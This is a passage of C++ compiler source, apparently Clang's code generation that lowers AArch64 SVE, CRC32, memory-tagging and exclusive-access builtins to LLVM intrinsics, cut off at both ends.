// truncate because the immediate has been range checked and no valid
// immediate requires more than a handful of bits.
*Result = Result->extOrTrunc(32);
Ops.push_back(llvm::ConstantInt::get(getLLVMContext(), *Result));
}
}
auto *Builtin = findARMVectorIntrinsicInMap(AArch64SVEIntrinsicMap, BuiltinID,
AArch64SVEIntrinsicsProvenSorted);
SVETypeFlags TypeFlags(Builtin->TypeModifier);
if (TypeFlags.isLoad())
return EmitSVEMaskedLoad(E, Ty, Ops, Builtin->LLVMIntrinsic,
TypeFlags.isZExtReturn());
else if (TypeFlags.isStore())
return EmitSVEMaskedStore(E, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isGatherLoad())
return EmitSVEGatherLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isScatterStore())
return EmitSVEScatterStore(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isPrefetch())
return EmitSVEPrefetchLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isGatherPrefetch())
return EmitSVEGatherPrefetch(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isStructLoad())
return EmitSVEStructLoad(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isStructStore())
return EmitSVEStructStore(TypeFlags, Ops, Builtin->LLVMIntrinsic);
else if (TypeFlags.isUndef())
return UndefValue::get(Ty);
else if (Builtin->LLVMIntrinsic != 0) {
if (TypeFlags.getMergeType() == SVETypeFlags::MergeZeroExp)
InsertExplicitZeroOperand(Builder, Ty, Ops);
if (TypeFlags.getMergeType() == SVETypeFlags::MergeAnyExp)
InsertExplicitUndefOperand(Builder, Ty, Ops);
// Some ACLE builtins leave out the argument to specify the predicate
// pattern, which is expected to be expanded to an SV_ALL pattern.
if (TypeFlags.isAppendSVALL())
Ops.push_back(Builder.getInt32(/*SV_ALL*/ 31));
if (TypeFlags.isInsertOp1SVALL())
Ops.insert(&Ops[1], Builder.getInt32(/*SV_ALL*/ 31));
// Predicates must match the main datatype.
for (unsigned i = 0, e = Ops.size(); i != e; ++i)
if (auto PredTy = dyn_cast<llvm::VectorType>(Ops[i]->getType()))
if (PredTy->getElementType()->isIntegerTy(1))
Ops[i] = EmitSVEPredicateCast(Ops[i], getSVEType(TypeFlags));
// Splat scalar operand to vector (intrinsics with _n infix)
if (TypeFlags.hasSplatOperand()) {
unsigned OpNo = TypeFlags.getSplatOperand();
Ops[OpNo] = EmitSVEDupX(Ops[OpNo]);
}
if (TypeFlags.isReverseCompare())
std::swap(Ops[1], Ops[2]);
if (TypeFlags.isReverseUSDOT())
std::swap(Ops[1], Ops[2]);
// Predicated intrinsics with _z suffix need a select w/ zeroinitializer.
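// For example (illustrative): svadd_s32_z(pg, a, b) first selects between a
// and zero under pg, then emits the predicated add, so inactive lanes of the
// result are zero.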
if (TypeFlags.getMergeType() == SVETypeFlags::MergeZero) {
llvm::Type *OpndTy = Ops[1]->getType();
auto *SplatZero = Constant::getNullValue(OpndTy);
Function *Sel = CGM.getIntrinsic(Intrinsic::aarch64_sve_sel, OpndTy);
Ops[1] = Builder.CreateCall(Sel, {Ops[0], Ops[1], SplatZero});
}
Function *F = CGM.getIntrinsic(Builtin->LLVMIntrinsic,
getSVEOverloadTypes(TypeFlags, Ty, Ops));
Value *Call = Builder.CreateCall(F, Ops);
// Predicate results must be converted to svbool_t.
if (auto PredTy = dyn_cast<llvm::VectorType>(Call->getType()))
if (PredTy->getScalarType()->isIntegerTy(1))
Call = EmitSVEPredicateCast(Call, cast<llvm::ScalableVectorType>(Ty));
return Call;
}
switch (BuiltinID) {
default:
return nullptr;
case SVE::BI__builtin_sve_svmov_b_z: {
// svmov_b_z(pg, op) <=> svand_b_z(pg, op, op)
SVETypeFlags TypeFlags(Builtin->TypeModifier);
llvm::Type* OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_and_z, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Ops[1], Ops[1]});
}
case SVE::BI__builtin_sve_svnot_b_z: {
// svnot_b_z(pg, op) <=> sveor_b_z(pg, op, pg)
SVETypeFlags TypeFlags(Builtin->TypeModifier);
llvm::Type* OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_eor_z, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Ops[1], Ops[0]});
}
case SVE::BI__builtin_sve_svmovlb_u16:
case SVE::BI__builtin_sve_svmovlb_u32:
case SVE::BI__builtin_sve_svmovlb_u64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_ushllb);
case SVE::BI__builtin_sve_svmovlb_s16:
case SVE::BI__builtin_sve_svmovlb_s32:
case SVE::BI__builtin_sve_svmovlb_s64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_sshllb);
case SVE::BI__builtin_sve_svmovlt_u16:
case SVE::BI__builtin_sve_svmovlt_u32:
case SVE::BI__builtin_sve_svmovlt_u64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_ushllt);
case SVE::BI__builtin_sve_svmovlt_s16:
case SVE::BI__builtin_sve_svmovlt_s32:
case SVE::BI__builtin_sve_svmovlt_s64:
return EmitSVEMovl(TypeFlags, Ops, Intrinsic::aarch64_sve_sshllt);
case SVE::BI__builtin_sve_svpmullt_u16:
case SVE::BI__builtin_sve_svpmullt_u64:
case SVE::BI__builtin_sve_svpmullt_n_u16:
case SVE::BI__builtin_sve_svpmullt_n_u64:
return EmitSVEPMull(TypeFlags, Ops, Intrinsic::aarch64_sve_pmullt_pair);
case SVE::BI__builtin_sve_svpmullb_u16:
case SVE::BI__builtin_sve_svpmullb_u64:
case SVE::BI__builtin_sve_svpmullb_n_u16:
case SVE::BI__builtin_sve_svpmullb_n_u64:
return EmitSVEPMull(TypeFlags, Ops, Intrinsic::aarch64_sve_pmullb_pair);
case SVE::BI__builtin_sve_svdup_n_b8:
case SVE::BI__builtin_sve_svdup_n_b16:
case SVE::BI__builtin_sve_svdup_n_b32:
case SVE::BI__builtin_sve_svdup_n_b64: {
Value *CmpNE =
Builder.CreateICmpNE(Ops[0], Constant::getNullValue(Ops[0]->getType()));
llvm::ScalableVectorType *OverloadedTy = getSVEType(TypeFlags);
Value *Dup = EmitSVEDupX(CmpNE, OverloadedTy);
return EmitSVEPredicateCast(Dup, cast<llvm::ScalableVectorType>(Ty));
}
case SVE::BI__builtin_sve_svdupq_n_b8:
case SVE::BI__builtin_sve_svdupq_n_b16:
case SVE::BI__builtin_sve_svdupq_n_b32:
case SVE::BI__builtin_sve_svdupq_n_b64:
case SVE::BI__builtin_sve_svdupq_n_u8:
case SVE::BI__builtin_sve_svdupq_n_s8:
case SVE::BI__builtin_sve_svdupq_n_u64:
case SVE::BI__builtin_sve_svdupq_n_f64:
case SVE::BI__builtin_sve_svdupq_n_s64:
case SVE::BI__builtin_sve_svdupq_n_u16:
case SVE::BI__builtin_sve_svdupq_n_f16:
case SVE::BI__builtin_sve_svdupq_n_bf16:
case SVE::BI__builtin_sve_svdupq_n_s16:
case SVE::BI__builtin_sve_svdupq_n_u32:
case SVE::BI__builtin_sve_svdupq_n_f32:
case SVE::BI__builtin_sve_svdupq_n_s32: {
// These builtins are implemented by building a fixed-length vector from the
// operands and using dupq_lane to replicate it across the whole scalable
// vector.
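// For example (illustrative): svdupq_n_s32(a, b, c, d) materializes
// <4 x i32> {a, b, c, d} and replicates it across every 128-bit quadword of
// the result.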
unsigned NumOpnds = Ops.size();
bool IsBoolTy =
cast<llvm::VectorType>(Ty)->getElementType()->isIntegerTy(1);
// For svdupq_n_b* the element type is an integer of width 128/NumOpnds bits,
// so that the compare can use the width that is natural for the expected
// number of predicate lanes.
llvm::Type *EltTy = Ops[0]->getType();
if (IsBoolTy)
EltTy = IntegerType::get(getLLVMContext(), SVEBitsPerBlock / NumOpnds);
SmallVector<llvm::Value *, 16> VecOps;
for (unsigned I = 0; I < NumOpnds; ++I)
VecOps.push_back(Builder.CreateZExt(Ops[I], EltTy));
Value *Vec = BuildVector(VecOps);
SVETypeFlags TypeFlags(Builtin->TypeModifier);
Value *Pred = EmitSVEAllTruePred(TypeFlags);
llvm::Type *OverloadedTy = getSVEVectorForElementType(EltTy);
Value *InsertSubVec = Builder.CreateInsertVector(
OverloadedTy, UndefValue::get(OverloadedTy), Vec, Builder.getInt64(0));
Function *F =
CGM.getIntrinsic(Intrinsic::aarch64_sve_dupq_lane, OverloadedTy);
Value *DupQLane =
Builder.CreateCall(F, {InsertSubVec, Builder.getInt64(0)});
if (!IsBoolTy)
return DupQLane;
// For svdupq_n_b* we need to add an additional 'cmpne' with '0'.
F = CGM.getIntrinsic(NumOpnds == 2 ? Intrinsic::aarch64_sve_cmpne
: Intrinsic::aarch64_sve_cmpne_wide,
OverloadedTy);
Value *Call = Builder.CreateCall(
F, {Pred, DupQLane, EmitSVEDupX(Builder.getInt64(0))});
return EmitSVEPredicateCast(Call, cast<llvm::ScalableVectorType>(Ty));
}
case SVE::BI__builtin_sve_svpfalse_b:
return ConstantInt::getFalse(Ty);
case SVE::BI__builtin_sve_svlen_bf16:
case SVE::BI__builtin_sve_svlen_f16:
case SVE::BI__builtin_sve_svlen_f32:
case SVE::BI__builtin_sve_svlen_f64:
case SVE::BI__builtin_sve_svlen_s8:
case SVE::BI__builtin_sve_svlen_s16:
case SVE::BI__builtin_sve_svlen_s32:
case SVE::BI__builtin_sve_svlen_s64:
case SVE::BI__builtin_sve_svlen_u8:
case SVE::BI__builtin_sve_svlen_u16:
case SVE::BI__builtin_sve_svlen_u32:
case SVE::BI__builtin_sve_svlen_u64: {
SVETypeFlags TF(Builtin->TypeModifier);
auto VTy = cast<llvm::VectorType>(getSVEType(TF));
auto *NumEls =
llvm::ConstantInt::get(Ty, VTy->getElementCount().getKnownMinValue());
Function *F = CGM.getIntrinsic(Intrinsic::vscale, Ty);
return Builder.CreateMul(NumEls, Builder.CreateCall(F));
}
case SVE::BI__builtin_sve_svtbl2_u8:
case SVE::BI__builtin_sve_svtbl2_s8:
case SVE::BI__builtin_sve_svtbl2_u16:
case SVE::BI__builtin_sve_svtbl2_s16:
case SVE::BI__builtin_sve_svtbl2_u32:
case SVE::BI__builtin_sve_svtbl2_s32:
case SVE::BI__builtin_sve_svtbl2_u64:
case SVE::BI__builtin_sve_svtbl2_s64:
case SVE::BI__builtin_sve_svtbl2_f16:
case SVE::BI__builtin_sve_svtbl2_bf16:
case SVE::BI__builtin_sve_svtbl2_f32:
case SVE::BI__builtin_sve_svtbl2_f64: {
SVETypeFlags TF(Builtin->TypeModifier);
auto VTy = cast<llvm::VectorType>(getSVEType(TF));
auto TupleTy = llvm::VectorType::getDoubleElementsVectorType(VTy);
Function *FExtr =
CGM.getIntrinsic(Intrinsic::aarch64_sve_tuple_get, {VTy, TupleTy});
Value *V0 = Builder.CreateCall(FExtr, {Ops[0], Builder.getInt32(0)});
Value *V1 = Builder.CreateCall(FExtr, {Ops[0], Builder.getInt32(1)});
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_sve_tbl2, VTy);
return Builder.CreateCall(F, {V0, V1, Ops[1]});
}
}
// Unreachable: every case in the switch above returns.
return nullptr;
}
Value *CodeGenFunction::EmitAArch64BuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
llvm::Triple::ArchType Arch) {
if (BuiltinID >= AArch64::FirstSVEBuiltin &&
BuiltinID <= AArch64::LastSVEBuiltin)
return EmitAArch64SVEBuiltinExpr(BuiltinID, E);
unsigned HintID = static_cast<unsigned>(-1);
switch (BuiltinID) {
default: break;
case AArch64::BI__builtin_arm_nop:
HintID = 0;
break;
case AArch64::BI__builtin_arm_yield:
case AArch64::BI__yield:
HintID = 1;
break;
case AArch64::BI__builtin_arm_wfe:
case AArch64::BI__wfe:
HintID = 2;
break;
case AArch64::BI__builtin_arm_wfi:
case AArch64::BI__wfi:
HintID = 3;
break;
case AArch64::BI__builtin_arm_sev:
case AArch64::BI__sev:
HintID = 4;
break;
case AArch64::BI__builtin_arm_sevl:
case AArch64::BI__sevl:
HintID = 5;
break;
}
if (HintID != static_cast<unsigned>(-1)) {
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_hint);
return Builder.CreateCall(F, llvm::ConstantInt::get(Int32Ty, HintID));
}
if (BuiltinID == AArch64::BI__builtin_arm_prefetch) {
Value *Address = EmitScalarExpr(E->getArg(0));
Value *RW = EmitScalarExpr(E->getArg(1));
Value *CacheLevel = EmitScalarExpr(E->getArg(2));
Value *RetentionPolicy = EmitScalarExpr(E->getArg(3));
Value *IsData = EmitScalarExpr(E->getArg(4));
Value *Locality = nullptr;
if (cast<llvm::ConstantInt>(RetentionPolicy)->isZero()) {
// Temporal fetch, needs to convert cache level to locality.
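// locality = 3 - cache_level, so the innermost cache level (0) maps to the
// most temporal LLVM locality (3).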
Locality = llvm::ConstantInt::get(Int32Ty,
-cast<llvm::ConstantInt>(CacheLevel)->getValue() + 3);
} else {
// Streaming fetch.
Locality = llvm::ConstantInt::get(Int32Ty, 0);
}
// FIXME: We need an AArch64-specific LLVM intrinsic if we want to specify
// PLDL3STRM or PLDL2STRM.
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return Builder.CreateCall(F, {Address, RW, Locality, IsData});
}
if (BuiltinID == AArch64::BI__builtin_arm_rbit) {
assert((getContext().getTypeSize(E->getType()) == 32) &&
"rbit of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == AArch64::BI__builtin_arm_rbit64) {
assert((getContext().getTypeSize(E->getType()) == 64) &&
"rbit of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::bitreverse, Arg->getType()), Arg, "rbit");
}
if (BuiltinID == AArch64::BI__builtin_arm_cls) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_cls), Arg,
"cls");
}
if (BuiltinID == AArch64::BI__builtin_arm_cls64) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_cls64), Arg,
"cls");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint32zf ||
BuiltinID == AArch64::BI__builtin_arm_frint32z) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint32z, Ty),
Arg, "frint32z");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint64zf ||
BuiltinID == AArch64::BI__builtin_arm_frint64z) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint64z, Ty),
Arg, "frint64z");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint32xf ||
BuiltinID == AArch64::BI__builtin_arm_frint32x) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint32x, Ty),
Arg, "frint32x");
}
if (BuiltinID == AArch64::BI__builtin_arm_frint64xf ||
BuiltinID == AArch64::BI__builtin_arm_frint64x) {
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = Arg->getType();
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::aarch64_frint64x, Ty),
Arg, "frint64x");
}
if (BuiltinID == AArch64::BI__builtin_arm_jcvt) {
assert((getContext().getTypeSize(E->getType()) == 32) &&
"__jcvt of unusual size!");
llvm::Value *Arg = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(Intrinsic::aarch64_fjcvtzs), Arg);
}
if (BuiltinID == AArch64::BI__builtin_arm_ld64b ||
BuiltinID == AArch64::BI__builtin_arm_st64b ||
BuiltinID == AArch64::BI__builtin_arm_st64bv ||
BuiltinID == AArch64::BI__builtin_arm_st64bv0) {
llvm::Value *MemAddr = EmitScalarExpr(E->getArg(0));
llvm::Value *ValPtr = EmitScalarExpr(E->getArg(1));
if (BuiltinID == AArch64::BI__builtin_arm_ld64b) {
// Load from the address via an LLVM intrinsic, receiving a
// tuple of 8 i64 words, and store each one to ValPtr.
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_ld64b);
llvm::Value *Val = Builder.CreateCall(F, MemAddr);
llvm::Value *ToRet;
for (size_t i = 0; i < 8; i++) {
llvm::Value *ValOffsetPtr =
Builder.CreateGEP(Int64Ty, ValPtr, Builder.getInt32(i));
Address Addr(ValOffsetPtr, CharUnits::fromQuantity(8));
ToRet = Builder.CreateStore(Builder.CreateExtractValue(Val, i), Addr);
}
return ToRet;
} else {
// Load 8 i64 words from ValPtr, and store them to the address
// via an LLVM intrinsic.
SmallVector<llvm::Value *, 9> Args;
Args.push_back(MemAddr);
for (size_t i = 0; i < 8; i++) {
llvm::Value *ValOffsetPtr =
Builder.CreateGEP(Int64Ty, ValPtr, Builder.getInt32(i));
Address Addr(ValOffsetPtr, CharUnits::fromQuantity(8));
Args.push_back(Builder.CreateLoad(Addr));
}
auto Intr = (BuiltinID == AArch64::BI__builtin_arm_st64b
? Intrinsic::aarch64_st64b
: BuiltinID == AArch64::BI__builtin_arm_st64bv
? Intrinsic::aarch64_st64bv
: Intrinsic::aarch64_st64bv0);
Function *F = CGM.getIntrinsic(Intr);
return Builder.CreateCall(F, Args);
}
}
if (BuiltinID == AArch64::BI__builtin_arm_rndr ||
BuiltinID == AArch64::BI__builtin_arm_rndrrs) {
auto Intr = (BuiltinID == AArch64::BI__builtin_arm_rndr
? Intrinsic::aarch64_rndr
: Intrinsic::aarch64_rndrrs);
Function *F = CGM.getIntrinsic(Intr);
llvm::Value *Val = Builder.CreateCall(F);
Value *RandomValue = Builder.CreateExtractValue(Val, 0);
Value *Status = Builder.CreateExtractValue(Val, 1);
Address MemAddress = EmitPointerWithAlignment(E->getArg(0));
Builder.CreateStore(RandomValue, MemAddress);
Status = Builder.CreateZExt(Status, Int32Ty);
return Status;
}
if (BuiltinID == AArch64::BI__clear_cache) {
assert(E->getNumArgs() == 2 && "__clear_cache takes 2 arguments");
const FunctionDecl *FD = E->getDirectCallee();
Value *Ops[2];
for (unsigned i = 0; i < 2; i++)
Ops[i] = EmitScalarExpr(E->getArg(i));
llvm::Type *Ty = CGM.getTypes().ConvertType(FD->getType());
llvm::FunctionType *FTy = cast<llvm::FunctionType>(Ty);
StringRef Name = FD->getName();
return EmitNounwindRuntimeCall(CGM.CreateRuntimeFunction(FTy, Name), Ops);
}
if ((BuiltinID == AArch64::BI__builtin_arm_ldrex ||
BuiltinID == AArch64::BI__builtin_arm_ldaex) &&
getContext().getTypeSize(E->getType()) == 128) {
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_ldaex
? Intrinsic::aarch64_ldaxp
: Intrinsic::aarch64_ldxp);
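// The intrinsic returns the two 64-bit halves as a struct; recombine them
// into a single i128 with element 1 in the high half.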
Value *LdPtr = EmitScalarExpr(E->getArg(0));
Value *Val = Builder.CreateCall(F, Builder.CreateBitCast(LdPtr, Int8PtrTy),
"ldxp");
Value *Val0 = Builder.CreateExtractValue(Val, 1);
Value *Val1 = Builder.CreateExtractValue(Val, 0);
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
Val0 = Builder.CreateZExt(Val0, Int128Ty);
Val1 = Builder.CreateZExt(Val1, Int128Ty);
Value *ShiftCst = llvm::ConstantInt::get(Int128Ty, 64);
Val = Builder.CreateShl(Val0, ShiftCst, "shl", true /* nuw */);
Val = Builder.CreateOr(Val, Val1);
return Builder.CreateBitCast(Val, ConvertType(E->getType()));
} else if (BuiltinID == AArch64::BI__builtin_arm_ldrex ||
BuiltinID == AArch64::BI__builtin_arm_ldaex) {
Value *LoadAddr = EmitScalarExpr(E->getArg(0));
QualType Ty = E->getType();
llvm::Type *RealResTy = ConvertType(Ty);
llvm::Type *PtrTy = llvm::IntegerType::get(
getLLVMContext(), getContext().getTypeSize(Ty))->getPointerTo();
LoadAddr = Builder.CreateBitCast(LoadAddr, PtrTy);
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_ldaex
? Intrinsic::aarch64_ldaxr
: Intrinsic::aarch64_ldxr,
PtrTy);
Value *Val = Builder.CreateCall(F, LoadAddr, "ldxr");
if (RealResTy->isPointerTy())
return Builder.CreateIntToPtr(Val, RealResTy);
llvm::Type *IntResTy = llvm::IntegerType::get(
getLLVMContext(), CGM.getDataLayout().getTypeSizeInBits(RealResTy));
Val = Builder.CreateTruncOrBitCast(Val, IntResTy);
return Builder.CreateBitCast(Val, RealResTy);
}
if ((BuiltinID == AArch64::BI__builtin_arm_strex ||
BuiltinID == AArch64::BI__builtin_arm_stlex) &&
getContext().getTypeSize(E->getArg(0)->getType()) == 128) {
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_stlex
? Intrinsic::aarch64_stlxp
: Intrinsic::aarch64_stxp);
llvm::Type *STy = llvm::StructType::get(Int64Ty, Int64Ty);
Address Tmp = CreateMemTemp(E->getArg(0)->getType());
EmitAnyExprToMem(E->getArg(0), Tmp, Qualifiers(), /*init*/ true);
Tmp = Builder.CreateBitCast(Tmp, llvm::PointerType::getUnqual(STy));
llvm::Value *Val = Builder.CreateLoad(Tmp);
Value *Arg0 = Builder.CreateExtractValue(Val, 0);
Value *Arg1 = Builder.CreateExtractValue(Val, 1);
Value *StPtr = Builder.CreateBitCast(EmitScalarExpr(E->getArg(1)),
Int8PtrTy);
return Builder.CreateCall(F, {Arg0, Arg1, StPtr}, "stxp");
}
if (BuiltinID == AArch64::BI__builtin_arm_strex ||
BuiltinID == AArch64::BI__builtin_arm_stlex) {
Value *StoreVal = EmitScalarExpr(E->getArg(0));
Value *StoreAddr = EmitScalarExpr(E->getArg(1));
QualType Ty = E->getArg(0)->getType();
llvm::Type *StoreTy = llvm::IntegerType::get(getLLVMContext(),
getContext().getTypeSize(Ty));
StoreAddr = Builder.CreateBitCast(StoreAddr, StoreTy->getPointerTo());
if (StoreVal->getType()->isPointerTy())
StoreVal = Builder.CreatePtrToInt(StoreVal, Int64Ty);
else {
llvm::Type *IntTy = llvm::IntegerType::get(
getLLVMContext(),
CGM.getDataLayout().getTypeSizeInBits(StoreVal->getType()));
StoreVal = Builder.CreateBitCast(StoreVal, IntTy);
StoreVal = Builder.CreateZExtOrBitCast(StoreVal, Int64Ty);
}
Function *F = CGM.getIntrinsic(BuiltinID == AArch64::BI__builtin_arm_stlex
? Intrinsic::aarch64_stlxr
: Intrinsic::aarch64_stxr,
StoreAddr->getType());
return Builder.CreateCall(F, {StoreVal, StoreAddr}, "stxr");
}
if (BuiltinID == AArch64::BI__getReg) {
Expr::EvalResult Result;
if (!E->getArg(0)->EvaluateAsInt(Result, CGM.getContext()))
llvm_unreachable("Sema will ensure that the parameter is constant");
llvm::APSInt Value = Result.Val.getInt();
LLVMContext &Context = CGM.getLLVMContext();
std::string Reg = Value == 31 ? "sp" : "x" + toString(Value, 10);
llvm::Metadata *Ops[] = {llvm::MDString::get(Context, Reg)};
llvm::MDNode *RegName = llvm::MDNode::get(Context, Ops);
llvm::Value *Metadata = llvm::MetadataAsValue::get(Context, RegName);
llvm::Function *F =
CGM.getIntrinsic(llvm::Intrinsic::read_register, {Int64Ty});
return Builder.CreateCall(F, Metadata);
}
if (BuiltinID == AArch64::BI__builtin_arm_clrex) {
Function *F = CGM.getIntrinsic(Intrinsic::aarch64_clrex);
return Builder.CreateCall(F);
}
if (BuiltinID == AArch64::BI_ReadWriteBarrier)
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::SingleThread);
// CRC32
Intrinsic::ID CRCIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case AArch64::BI__builtin_arm_crc32b:
CRCIntrinsicID = Intrinsic::aarch64_crc32b; break;
case AArch64::BI__builtin_arm_crc32cb:
CRCIntrinsicID = Intrinsic::aarch64_crc32cb; break;
case AArch64::BI__builtin_arm_crc32h:
CRCIntrinsicID = Intrinsic::aarch64_crc32h; break;
case AArch64::BI__builtin_arm_crc32ch:
CRCIntrinsicID = Intrinsic::aarch64_crc32ch; break;
case AArch64::BI__builtin_arm_crc32w:
CRCIntrinsicID = Intrinsic::aarch64_crc32w; break;
case AArch64::BI__builtin_arm_crc32cw:
CRCIntrinsicID = Intrinsic::aarch64_crc32cw; break;
case AArch64::BI__builtin_arm_crc32d:
CRCIntrinsicID = Intrinsic::aarch64_crc32x; break;
case AArch64::BI__builtin_arm_crc32cd:
CRCIntrinsicID = Intrinsic::aarch64_crc32cx; break;
}
if (CRCIntrinsicID != Intrinsic::not_intrinsic) {
Value *Arg0 = EmitScalarExpr(E->getArg(0));
Value *Arg1 = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(CRCIntrinsicID);
llvm::Type *DataTy = F->getFunctionType()->getParamType(1);
Arg1 = Builder.CreateZExtOrBitCast(Arg1, DataTy);
return Builder.CreateCall(F, {Arg0, Arg1});
}
// Memory Tagging Extensions (MTE) Intrinsics
Intrinsic::ID MTEIntrinsicID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
case AArch64::BI__builtin_arm_irg:
MTEIntrinsicID = Intrinsic::aarch64_irg; break;
case AArch64::BI__builtin_arm_addg:
MTEIntrinsicID = Intrinsic::aarch64_addg; break;
case AArch64::BI__builtin_arm_gmi:
MTEIntrinsicID = Intrinsic::aarch64_gmi; break;
case AArch64::BI__builtin_arm_ldg:
MTEIntrinsicID = Intrinsic::aarch64_ldg; break;
case AArch64::BI__builtin_arm_stg:
MTEIntrinsicID = Intrinsic::aarch64_stg; break;
case AArch64::BI__builtin_arm_subp:
MTEIntrinsicID = Intrinsic::aarch64_subp; break;
}
if (MTEIntrinsicID != Intrinsic::not_intrinsic) {
llvm::Type *T = ConvertType(E->getType());
if (MTEIntrinsicID == Intrinsic::aarch64_irg) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *Mask = EmitScalarExpr(E->getArg(1));
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
Mask = Builder.CreateZExt(Mask, Int64Ty);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, Mask});
return Builder.CreatePointerCast(RV, T);
}
if (MTEIntrinsicID == Intrinsic::aarch64_addg) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *TagOffset = EmitScalarExpr(E->getArg(1));
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
TagOffset = Builder.CreateZExt(TagOffset, Int64Ty);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, TagOffset});
return Builder.CreatePointerCast(RV, T);
}
if (MTEIntrinsicID == Intrinsic::aarch64_gmi) {
Value *Pointer = EmitScalarExpr(E->getArg(0));
Value *ExcludedMask = EmitScalarExpr(E->getArg(1));
ExcludedMask = Builder.CreateZExt(ExcludedMask, Int64Ty);
Pointer = Builder.CreatePointerCast(Pointer, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {Pointer, ExcludedMask});
}
// Although it is possible to supply a different return address (first arg)
// to this intrinsic, for now we set the return address to be the same as the
// input address.
if (MTEIntrinsicID == Intrinsic::aarch64_ldg) {
Value *TagAddress = EmitScalarExpr(E->getArg(0));
TagAddress = Builder.CreatePointerCast(TagAddress, Int8PtrTy);
Value *RV = Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {TagAddress, TagAddress});
return Builder.CreatePointerCast(RV, T);
}
// Although it is possible to supply a different tag (to set) to this
// intrinsic (as the first arg), for now we supply the tag that is in the
// input address arg (the common use case).
if (MTEIntrinsicID == Intrinsic::aarch64_stg) {
Value *TagAddress = EmitScalarExpr(E->getArg(0));
TagAddress = Builder.CreatePointerCast(TagAddress, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {TagAddress, TagAddress});
}
if (MTEIntrinsicID == Intrinsic::aarch64_subp) {
Value *PointerA = EmitScalarExpr(E->getArg(0));
Value *PointerB = EmitScalarExpr(E->getArg(1));
PointerA = Builder.CreatePointerCast(PointerA, Int8PtrTy);
PointerB = Builder.CreatePointerCast(PointerB, Int8PtrTy);
return Builder.CreateCall(
CGM.getIntrinsic(MTEIntrinsicID), {PointerA, PointerB});
}
}
if (BuiltinID == AArch64::BI__builtin_arm_rsr ||
BuiltinID == AArch64::BI__builtin_arm_rsr64 ||
BuiltinID == AArch64::BI__builtin_arm_rsrp ||
BuiltinID == AArch64::BI__builtin_arm_wsr ||
BuiltinID == AArch64::BI__builtin_arm_wsr64 ||
BuiltinID == AArch64::BI__builtin_arm_wsrp) {
SpecialRegisterAccessKind AccessKind = Write;
if (BuiltinID == AArch64::BI__builtin_arm_rsr ||
BuiltinID == AArch64::BI__builtin_arm_rsr64 ||
BuiltinID == AArch64::BI__builtin_arm_rsrp)
AccessKind = VolatileRead;
bool IsPointerBuiltin = BuiltinID == AArch64::BI__builtin_arm_rsrp ||
BuiltinID == AArch64::BI__builtin_arm_wsrp;
bool Is64Bit = BuiltinID != AArch64::BI__builtin_arm_rsr &&
BuiltinID != AArch64::BI__builtin_arm_wsr;
llvm::Type *ValueType;
llvm::Type *RegisterType = Int64Ty;
